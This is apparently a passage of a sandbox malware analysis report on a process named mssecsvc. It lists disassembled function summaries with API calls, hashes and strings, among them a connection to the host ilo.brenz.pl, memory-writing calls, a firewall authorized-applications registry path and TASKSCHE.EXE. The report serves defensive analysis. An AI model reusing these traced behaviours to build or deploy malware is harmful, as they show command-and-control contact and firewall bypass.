                                                                                                                                                • Opcode Fuzzy Hash: 7e6d81ae67240a40e11905e7904a542b9946b97cc322a4af05470e0a41c17acf
                                                                                                                                                • Instruction Fuzzy Hash: 9A21F970301646BBDB18DE65CC55FBA7369FF80648F401118E85ABE1D4DBB2BA24C758
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 7FEA1422 Relevance: 3.0, APIs: 2, Instructions: 38nativeCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • LookupPrivilegeValueA.ADVAPI32(00000000,?), ref: 7FEA145A
                                                                                                                                                • NtAdjustPrivilegesToken.NTDLL(?,00000000,?,00000000,00000000,00000000), ref: 7FEA146A
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.505701930.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AdjustLookupPrivilegePrivilegesTokenValue
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3615134276-0
                                                                                                                                                • Opcode ID: 4d961b29825b6918877cf0b8ca3bbdf1a1a783037955428b050f6265267c3a26
                                                                                                                                                • Instruction ID: ddbff97e699881e74d61e2820170bd54818263a6fff0c1519b9bac5ac29647fb
                                                                                                                                                • Opcode Fuzzy Hash: 4d961b29825b6918877cf0b8ca3bbdf1a1a783037955428b050f6265267c3a26
                                                                                                                                                • Instruction Fuzzy Hash: 5BF0AE36542510BBD7205F56CD8EED77F28EF533A0F144556F4484E151C2624BA5D3F4
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 7FEA2477 Relevance: 3.0, APIs: 2, Instructions: 25nativeCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • NtProtectVirtualMemory.NTDLL(?,?,?,00000040), ref: 7FEA249B
                                                                                                                                                • NtWriteVirtualMemory.NTDLL ref: 7FEA24A4
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.505701930.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: MemoryVirtual$ProtectWrite
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 151266762-0
                                                                                                                                                • Opcode ID: 3b89ad314080acfcfa5e752e4380cd5b7e8fc3aa7940f56e0bfe36a9f1ccff9c
                                                                                                                                                • Instruction ID: 6bbb67ea70d6ee96dfa5f1d7b4d314b28acc786a60d934acbd3f762ecc45b662
                                                                                                                                                • Opcode Fuzzy Hash: 3b89ad314080acfcfa5e752e4380cd5b7e8fc3aa7940f56e0bfe36a9f1ccff9c
                                                                                                                                                • Instruction Fuzzy Hash: 2AE012E07502007FF5185F55DC5FF7B391DDB41751F410208FA0A981C4F9A15E18467A
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 7FEA144A Relevance: 3.0, APIs: 2, Instructions: 22nativeCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • LookupPrivilegeValueA.ADVAPI32(00000000,?), ref: 7FEA145A
                                                                                                                                                • NtAdjustPrivilegesToken.NTDLL(?,00000000,?,00000000,00000000,00000000), ref: 7FEA146A
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.505701930.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AdjustLookupPrivilegePrivilegesTokenValue
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3615134276-0
                                                                                                                                                • Opcode ID: f45ad7484d04f34a0af0f423c52b42987f710650b5115a9fa6d287fad7b05342
                                                                                                                                                • Instruction ID: ee32c209e3d0a2de55b6acbdbca8a3d00d8b73f2470e3acbbab87dcaf3c2c19a
                                                                                                                                                • Opcode Fuzzy Hash: f45ad7484d04f34a0af0f423c52b42987f710650b5115a9fa6d287fad7b05342
                                                                                                                                                • Instruction Fuzzy Hash: F2D06731643034BBD6312A568C0EEE77D1DEF577A0F015041F9089A1A1C5A28EA1C7F5
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 7FEA28C8 Relevance: .1, Instructions: 107COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.505701930.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 0642b33d3ce8112a54256d33be083f0dc48b56f423af93a4a8a3c14605054926
                                                                                                                                                • Instruction ID: 599e4210a27b95691828082bf071d632d483ec5813d8a2b375e76b2b2bcd3a21
                                                                                                                                                • Opcode Fuzzy Hash: 0642b33d3ce8112a54256d33be083f0dc48b56f423af93a4a8a3c14605054926
                                                                                                                                                • Instruction Fuzzy Hash: 6A31F5326006158BEB148E38C94079AB7F2FB84704F10C63CE557FB594D676F6898BC0
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00AC28C8 Relevance: .1, Instructions: 107COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.502417271.0000000000AC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 00AC0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_ac0000_mssecsvc.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 0642b33d3ce8112a54256d33be083f0dc48b56f423af93a4a8a3c14605054926
                                                                                                                                                • Instruction ID: 2e61099f64a78ab7583943c58d111484289b82e4e0b73db93967b11ba732727b
                                                                                                                                                • Opcode Fuzzy Hash: 0642b33d3ce8112a54256d33be083f0dc48b56f423af93a4a8a3c14605054926
                                                                                                                                                • Instruction Fuzzy Hash: EC312A326006198FEB248F38C840B9AB7F2FB94304F11863CE556E7690D675FA898BC0
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 7FEA025E Relevance: .0, Instructions: 44COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.505701930.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 014a46c37de232e83438f8824cd98cb5cccc3472957eadabff76c327c457b708
                                                                                                                                                • Instruction ID: e209dc4afff2123aedd60371c3f43909d97dd8c59077e4d5532942e395217995
                                                                                                                                                • Opcode Fuzzy Hash: 014a46c37de232e83438f8824cd98cb5cccc3472957eadabff76c327c457b708
                                                                                                                                                • Instruction Fuzzy Hash: 7E0128326053455FC721DE38CC84FAEBBA1FBC4734F118325E6445E08AD633A241C661
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00AC025E Relevance: .0, Instructions: 44COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.502417271.0000000000AC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 00AC0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_ac0000_mssecsvc.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 014a46c37de232e83438f8824cd98cb5cccc3472957eadabff76c327c457b708
                                                                                                                                                • Instruction ID: 0fab82a26548e201a77adbf34331a9ed295246cd511fdf6e7f687ab1349d8096
                                                                                                                                                • Opcode Fuzzy Hash: 014a46c37de232e83438f8824cd98cb5cccc3472957eadabff76c327c457b708
                                                                                                                                                • Instruction Fuzzy Hash: 47012832244145DBC720EF38CD88F9EF7A5BB84734F16832DF5545A086D732A241C651
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 7FEA3F8F Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 224networkthreadlibraryCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • LoadLibraryA.KERNEL32(7FEA3F83), ref: 7FEA3F8F
                                                                                                                                                • WSAStartup.WS2_32(00000101), ref: 7FEA3FCE
                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00003888,00000000,00000000), ref: 7FEA3FE9
                                                                                                                                                • CloseHandle.KERNEL32(?,00000000), ref: 7FEA3FF2
                                                                                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 7FEA3FFF
                                                                                                                                                • lstrlen.KERNEL32(ilo.brenz.pl,?,00000000), ref: 7FEA4057
                                                                                                                                                • gethostbyname.WS2_32(ilo.brenz.pl), ref: 7FEA4066
                                                                                                                                                • socket.WS2_32(00000002,00000001,00000000), ref: 7FEA4097
                                                                                                                                                • connect.WS2_32(6F6C6902,7FEA3B09,00000010), ref: 7FEA40B1
                                                                                                                                                • GetVersionExA.KERNEL32(?,?,00000000), ref: 7FEA40FB
                                                                                                                                                • wsprintfA.USER32 ref: 7FEA4179
                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00003819,6F6C6902,00000000), ref: 7FEA41B4
                                                                                                                                                • CloseHandle.KERNEL32(?,00000000,6F6C6902,7FEA6AA2,00000000,00000000), ref: 7FEA41BD
                                                                                                                                                • GetTickCount.KERNEL32 ref: 7FEA41F6
                                                                                                                                                • RtlExitUserThread.NTDLL(00000000), ref: 7FEA4322
                                                                                                                                                Strings
                                                                                                                                                • C:\Program Files (x86)\QxmjpcazkXhrxEMyZMHZXXEYGdZKTLIuGGuluQecNfOrZXEwSk\mcelwciKpeNAdrHBUbBbQgwqJRdg.exe, xrefs: 7FEA4195, 7FEA41DB
                                                                                                                                                • \DEVICE\AFD\ENDPOINT, xrefs: 7FEA41DA
                                                                                                                                                • ilo.brenz.pl, xrefs: 7FEA4056, 7FEA4065
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.505701930.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CreateThread$CloseHandle$CountEventExitLibraryLoadStartupTickUserVersionconnectgethostbynamelstrlensocketwsprintf
                                                                                                                                                • String ID: C:\Program Files (x86)\QxmjpcazkXhrxEMyZMHZXXEYGdZKTLIuGGuluQecNfOrZXEwSk\mcelwciKpeNAdrHBUbBbQgwqJRdg.exe$\DEVICE\AFD\ENDPOINT$ilo.brenz.pl
                                                                                                                                                • API String ID: 3316401344-2193748943
                                                                                                                                                • Opcode ID: ee4b1f535ca79d9535994823dd2765b1aa6c936bb005bd660b800cb5032af16f
                                                                                                                                                • Instruction ID: 1da76589fb4dd87b5df105d6ae65f4369b8eb418b0376c81cadce6663e0d34e8
                                                                                                                                                • Opcode Fuzzy Hash: ee4b1f535ca79d9535994823dd2765b1aa6c936bb005bd660b800cb5032af16f
                                                                                                                                                • Instruction Fuzzy Hash: 1391EC71508348BEEB229F348859BEE7FAEEF41304F000648E85A9E191C3F66F45DB65
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00AC3F8F Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 224networkthreadlibraryCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • LoadLibraryA.KERNEL32(00AC3F83), ref: 00AC3F8F
                                                                                                                                                • WSAStartup.WS2_32(00000101), ref: 00AC3FCE
                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00003888,00000000,00000000), ref: 00AC3FE9
                                                                                                                                                • CloseHandle.KERNEL32(?,00000000), ref: 00AC3FF2
                                                                                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 00AC3FFF
                                                                                                                                                • lstrlen.KERNEL32(ilo.brenz.pl,?,00000000), ref: 00AC4057
                                                                                                                                                • gethostbyname.WS2_32(ilo.brenz.pl), ref: 00AC4066
                                                                                                                                                • socket.WS2_32(00000002,00000001,00000000), ref: 00AC4097
                                                                                                                                                • connect.WS2_32(6F6C6902,00AC3B09,00000010), ref: 00AC40B1
                                                                                                                                                • GetVersionExA.KERNEL32(?,?,00000000), ref: 00AC40FB
                                                                                                                                                • wsprintfA.USER32 ref: 00AC4179
                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00003819,6F6C6902,00000000), ref: 00AC41B4
                                                                                                                                                • CloseHandle.KERNEL32(?,00000000,6F6C6902,00AC6AA2,00000000,00000000), ref: 00AC41BD
                                                                                                                                                • GetTickCount.KERNEL32 ref: 00AC41F6
                                                                                                                                                • RtlExitUserThread.NTDLL(00000000), ref: 00AC4322
                                                                                                                                                Strings
                                                                                                                                                • C:\Program Files (x86)\QxmjpcazkXhrxEMyZMHZXXEYGdZKTLIuGGuluQecNfOrZXEwSk\mcelwciKpeNAdrHBUbBbQgwqJRdg.exe, xrefs: 00AC4195, 00AC41DB
                                                                                                                                                • ilo.brenz.pl, xrefs: 00AC4056, 00AC4065
                                                                                                                                                • C:\WINDOWS\TASKSCHE.EXE, xrefs: 00AC41DA
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.502417271.0000000000AC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 00AC0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_ac0000_mssecsvc.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CreateThread$CloseHandle$CountEventExitLibraryLoadStartupTickUserVersionconnectgethostbynamelstrlensocketwsprintf
                                                                                                                                                • String ID: C:\Program Files (x86)\QxmjpcazkXhrxEMyZMHZXXEYGdZKTLIuGGuluQecNfOrZXEwSk\mcelwciKpeNAdrHBUbBbQgwqJRdg.exe$C:\WINDOWS\TASKSCHE.EXE$ilo.brenz.pl
                                                                                                                                                • API String ID: 3316401344-168608021
                                                                                                                                                • Opcode ID: ee4b1f535ca79d9535994823dd2765b1aa6c936bb005bd660b800cb5032af16f
                                                                                                                                                • Instruction ID: dec2bfbe2e0c927ee54fad0e254e022524248fa71d51e37fd8f9afe2a10c63a0
                                                                                                                                                • Opcode Fuzzy Hash: ee4b1f535ca79d9535994823dd2765b1aa6c936bb005bd660b800cb5032af16f
                                                                                                                                                • Instruction Fuzzy Hash: 1191CC71504288BAEF319F24882EBEE7BADEF49310F05060CE99A9E181C7F45F45D769
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 7FEA3EB5 Relevance: 33.5, APIs: 15, Strings: 4, Instructions: 276networklibrarythreadCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • LoadLibraryA.KERNEL32(7FEA3EA9), ref: 7FEA3EB5
                                                                                                                                                  • Part of subcall function 7FEA3ECC: GetProcAddress.KERNEL32(00000000,7FEA3EC0), ref: 7FEA3ECD
                                                                                                                                                  • Part of subcall function 7FEA3ECC: GetModuleFileNameA.KERNEL32(00000000,C:\Program Files (x86)\QxmjpcazkXhrxEMyZMHZXXEYGdZKTLIuGGuluQecNfOrZXEwSk\mcelwciKpeNAdrHBUbBbQgwqJRdg.exe,000000C8), ref: 7FEA3EE2
                                                                                                                                                  • Part of subcall function 7FEA3ECC: wsprintfA.USER32 ref: 7FEA3EF7
                                                                                                                                                  • Part of subcall function 7FEA3ECC: CreateThread.KERNEL32(00000000,00000000,7FEA3691,00000000,00000000), ref: 7FEA3F40
                                                                                                                                                  • Part of subcall function 7FEA3ECC: CloseHandle.KERNEL32(?,E81213EA), ref: 7FEA3F49
                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00003888,00000000,00000000), ref: 7FEA3FE9
                                                                                                                                                • CloseHandle.KERNEL32(?,00000000), ref: 7FEA3FF2
                                                                                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 7FEA3FFF
                                                                                                                                                • socket.WS2_32(00000002,00000001,00000000), ref: 7FEA4097
                                                                                                                                                • connect.WS2_32(6F6C6902,7FEA3B09,00000010), ref: 7FEA40B1
                                                                                                                                                • GetVersionExA.KERNEL32(?,?,00000000), ref: 7FEA40FB
                                                                                                                                                • wsprintfA.USER32 ref: 7FEA4179
                                                                                                                                                Strings
                                                                                                                                                • C:\Program Files (x86)\QxmjpcazkXhrxEMyZMHZXXEYGdZKTLIuGGuluQecNfOrZXEwSk\mcelwciKpeNAdrHBUbBbQgwqJRdg.exe, xrefs: 7FEA3EDF, 7FEA3EF4, 7FEA3F0B, 7FEA4195, 7FEA41DB
                                                                                                                                                • C:,, xrefs: 7FEA3EF6, 7FEA3F08
                                                                                                                                                • \DEVICE\AFD\ENDPOINT, xrefs: 7FEA41DA
                                                                                                                                                • SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 7FEA3F0C
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.505701930.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Create$CloseHandleThreadwsprintf$AddressEventFileLibraryLoadModuleNameProcVersionconnectsocket
                                                                                                                                                • String ID: C:,$C:\Program Files (x86)\QxmjpcazkXhrxEMyZMHZXXEYGdZKTLIuGGuluQecNfOrZXEwSk\mcelwciKpeNAdrHBUbBbQgwqJRdg.exe$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List$\DEVICE\AFD\ENDPOINT
                                                                                                                                                • API String ID: 4150863296-3048976199
                                                                                                                                                • Opcode ID: 9f06b138147dde36dface2e64d8b648724a67120387ec8aabe41be75442747ba
                                                                                                                                                • Instruction ID: a15a6457230e598bb6ef6cbbffa0e8635eaa4eb844119d8f0639b47af27d7a61
                                                                                                                                                • Opcode Fuzzy Hash: 9f06b138147dde36dface2e64d8b648724a67120387ec8aabe41be75442747ba
                                                                                                                                                • Instruction Fuzzy Hash: A3A1FF71419348BFEB219F348C49BFA7BACEF41304F004659E84A9E092D6F66F05C7A2
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00AC3EB5 Relevance: 33.5, APIs: 15, Strings: 4, Instructions: 276networklibrarythreadCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • LoadLibraryA.KERNEL32(00AC3EA9), ref: 00AC3EB5
                                                                                                                                                  • Part of subcall function 00AC3ECC: GetProcAddress.KERNEL32(00000000,00AC3EC0), ref: 00AC3ECD
                                                                                                                                                  • Part of subcall function 00AC3ECC: GetModuleFileNameA.KERNEL32(00000000,C:\Program Files (x86)\QxmjpcazkXhrxEMyZMHZXXEYGdZKTLIuGGuluQecNfOrZXEwSk\mcelwciKpeNAdrHBUbBbQgwqJRdg.exe,000000C8), ref: 00AC3EE2
                                                                                                                                                  • Part of subcall function 00AC3ECC: wsprintfA.USER32 ref: 00AC3EF7
                                                                                                                                                  • Part of subcall function 00AC3ECC: CreateThread.KERNEL32(00000000,00000000,00AC3691,00000000,00000000), ref: 00AC3F40
                                                                                                                                                  • Part of subcall function 00AC3ECC: CloseHandle.KERNEL32(?,E81213EA), ref: 00AC3F49
                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00003888,00000000,00000000), ref: 00AC3FE9
                                                                                                                                                • CloseHandle.KERNEL32(?,00000000), ref: 00AC3FF2
                                                                                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 00AC3FFF
                                                                                                                                                • socket.WS2_32(00000002,00000001,00000000), ref: 00AC4097
                                                                                                                                                • connect.WS2_32(6F6C6902,00AC3B09,00000010), ref: 00AC40B1
                                                                                                                                                • GetVersionExA.KERNEL32(?,?,00000000), ref: 00AC40FB
                                                                                                                                                • wsprintfA.USER32 ref: 00AC4179
                                                                                                                                                Strings
                                                                                                                                                • SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 00AC3F0C
                                                                                                                                                • C:\Program Files (x86)\QxmjpcazkXhrxEMyZMHZXXEYGdZKTLIuGGuluQecNfOrZXEwSk\mcelwciKpeNAdrHBUbBbQgwqJRdg.exe, xrefs: 00AC3EDF, 00AC3EF4, 00AC3F0B, 00AC4195, 00AC41DB
                                                                                                                                                • C:,, xrefs: 00AC3EF6, 00AC3F08
                                                                                                                                                • C:\WINDOWS\TASKSCHE.EXE, xrefs: 00AC41DA
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.502417271.0000000000AC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 00AC0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_ac0000_mssecsvc.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Create$CloseHandleThreadwsprintf$AddressEventFileLibraryLoadModuleNameProcVersionconnectsocket
                                                                                                                                                • String ID: C:,$C:\Program Files (x86)\QxmjpcazkXhrxEMyZMHZXXEYGdZKTLIuGGuluQecNfOrZXEwSk\mcelwciKpeNAdrHBUbBbQgwqJRdg.exe$C:\WINDOWS\TASKSCHE.EXE$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
                                                                                                                                                • API String ID: 4150863296-1428418298
                                                                                                                                                • Opcode ID: 9f06b138147dde36dface2e64d8b648724a67120387ec8aabe41be75442747ba
                                                                                                                                                • Instruction ID: a6a1000a0bd5110e847cf5ba0197f15932b6314e4b97b4582aeae809fbfdcd83
                                                                                                                                                • Opcode Fuzzy Hash: 9f06b138147dde36dface2e64d8b648724a67120387ec8aabe41be75442747ba
                                                                                                                                                • Instruction Fuzzy Hash: 26A1DF72508248BFEB219F248C5EFEA7BACEF45300F06464DE84A9E082D6F45F45C7A5
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 7FEA3ECC Relevance: 33.5, APIs: 15, Strings: 4, Instructions: 265threadlibraryloaderCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,7FEA3EC0), ref: 7FEA3ECD
                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,C:\Program Files (x86)\QxmjpcazkXhrxEMyZMHZXXEYGdZKTLIuGGuluQecNfOrZXEwSk\mcelwciKpeNAdrHBUbBbQgwqJRdg.exe,000000C8), ref: 7FEA3EE2
                                                                                                                                                • wsprintfA.USER32 ref: 7FEA3EF7
                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,7FEA3691,00000000,00000000), ref: 7FEA3F40
                                                                                                                                                • CloseHandle.KERNEL32(?,E81213EA), ref: 7FEA3F49
                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00003888,00000000,00000000), ref: 7FEA3FE9
                                                                                                                                                • CloseHandle.KERNEL32(?,00000000), ref: 7FEA3FF2
                                                                                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 7FEA3FFF
                                                                                                                                                  • Part of subcall function 7FEA3405: NtOpenSection.NTDLL(?,00000006,?,00000018,?,?,00000040,?,?,63697379), ref: 7FEA344A
                                                                                                                                                  • Part of subcall function 7FEA3405: NtQuerySystemInformation.NTDLL(0000000B,?,00000120,00000000), ref: 7FEA3469
                                                                                                                                                  • Part of subcall function 7FEA3405: MapViewOfFile.KERNEL32(?,00000006,00000000,?,?,?,00000120,00000000), ref: 7FEA3493
                                                                                                                                                  • Part of subcall function 7FEA3405: CloseHandle.KERNEL32(?,00000000,?,00000120,00000000), ref: 7FEA34A0
                                                                                                                                                  • Part of subcall function 7FEA3405: UnmapViewOfFile.KERNEL32(?), ref: 7FEA34B8
                                                                                                                                                Strings
                                                                                                                                                • C:\Program Files (x86)\QxmjpcazkXhrxEMyZMHZXXEYGdZKTLIuGGuluQecNfOrZXEwSk\mcelwciKpeNAdrHBUbBbQgwqJRdg.exe, xrefs: 7FEA3EDF, 7FEA3EF4, 7FEA3F0B, 7FEA4195, 7FEA41DB
                                                                                                                                                • C:,, xrefs: 7FEA3EF6, 7FEA3F08
                                                                                                                                                • \DEVICE\AFD\ENDPOINT, xrefs: 7FEA41DA
                                                                                                                                                • SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 7FEA3F0C
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.505701930.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CloseCreateFileHandle$ThreadView$AddressEventInformationModuleNameOpenProcQuerySectionSystemUnmapwsprintf
                                                                                                                                                • String ID: C:,$C:\Program Files (x86)\QxmjpcazkXhrxEMyZMHZXXEYGdZKTLIuGGuluQecNfOrZXEwSk\mcelwciKpeNAdrHBUbBbQgwqJRdg.exe$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List$\DEVICE\AFD\ENDPOINT
                                                                                                                                                • API String ID: 541178049-3048976199
                                                                                                                                                • Opcode ID: 3176691832235144c822bda6bdece0b9c65d83022bcced3ec1f9b4779e38ef98
                                                                                                                                                • Instruction ID: d9e398f0cb57442fd0ba00def27d3fe33590f3ea382637dc010686527708efc5
                                                                                                                                                • Opcode Fuzzy Hash: 3176691832235144c822bda6bdece0b9c65d83022bcced3ec1f9b4779e38ef98
                                                                                                                                                • Instruction Fuzzy Hash: 65A10071408348BFEB219F348C49BEA7BACEF81304F004659E84A9E091D7F66F05C7A1
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00AC3ECC Relevance: 33.5, APIs: 15, Strings: 4, Instructions: 265threadlibraryloaderCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,00AC3EC0), ref: 00AC3ECD
                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,C:\Program Files (x86)\QxmjpcazkXhrxEMyZMHZXXEYGdZKTLIuGGuluQecNfOrZXEwSk\mcelwciKpeNAdrHBUbBbQgwqJRdg.exe,000000C8), ref: 00AC3EE2
                                                                                                                                                • wsprintfA.USER32 ref: 00AC3EF7
                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,00AC3691,00000000,00000000), ref: 00AC3F40
                                                                                                                                                • CloseHandle.KERNEL32(?,E81213EA), ref: 00AC3F49
                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00003888,00000000,00000000), ref: 00AC3FE9
                                                                                                                                                • CloseHandle.KERNEL32(?,00000000), ref: 00AC3FF2
                                                                                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 00AC3FFF
                                                                                                                                                  • Part of subcall function 00AC3405: NtOpenSection.NTDLL(?,00000006,?,00000018,?,?,00000040,?,?,63697379), ref: 00AC344A
                                                                                                                                                  • Part of subcall function 00AC3405: NtQuerySystemInformation.NTDLL(0000000B,?,00000120,00000000), ref: 00AC3469
